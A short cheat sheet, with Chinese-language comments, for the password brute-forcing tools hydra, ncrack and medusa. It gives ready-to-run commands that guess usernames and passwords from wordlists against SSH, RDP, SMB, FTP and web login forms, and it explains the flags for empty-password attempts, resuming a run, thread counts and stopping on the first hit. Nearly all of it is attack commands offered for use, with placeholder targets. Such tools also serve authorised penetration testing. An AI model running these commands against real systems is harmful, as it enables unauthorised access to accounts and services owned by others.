https://github.com/nmap/ncrack
https://github.com/vanhauser-thc/thc-hydra
http://foofus.net/goons/jmk/tools/
http://www.libssh.org/

yum install -y freerdp freerdp-devel
# -e ns: 空密码试探+指定用户名密码试探
# -R: 继续上一次的进度
# -t: 同时运行的线程数,默认16
# -s: 指定端口
hydra -L user.txt -P pwd.txt -e ns -vV -f -o ssh.log IP ssh  # -f:当破解了一个密码就停止
hydra -L user.txt -P pwd.txt -vV IP rdp/smb/ftp
hydra -l admin -P pwd.txt -m /index.php IP https
hydra -l admin -P pwd.txt -vV -f xx https-get https://xx/
hydra -l admin -P pwd.txt -vV IP http-post-form "/login:id=^USER^&password=^PASS^:wrong username or password"

ncrack -U user.txt -P pass.txt ftp://xxxx
ncrack -vv -U default.user/windows.user -P default.pwd/windows.pwd xxx:3389 CL=1 -f

# -M  指定module,如 FTP,HTTP,MSSQL,MYSQL,PostgreSQL,IMAP,POP3,SNMP,SSH,Telnet,VNC..
# -h  指定目标(如router)地址, -H:可指定一个输入文件,里面指定多个目标
# -n  指定目标的端口,如果他们不是默认时
# -u  指定user,如admin, -U:可指定一个输入文件,里面指定多个用户名
# -p  指定password, -P:类比-U
# -f  或-F,找到密码后允许我们停止扫描
# -e  如 -e ns :验证时可以吧用户名当作密码,可以使用空密码
medusa -M http -h 192.168.0.1 -n 80 -u admin -P wordlist.txt -F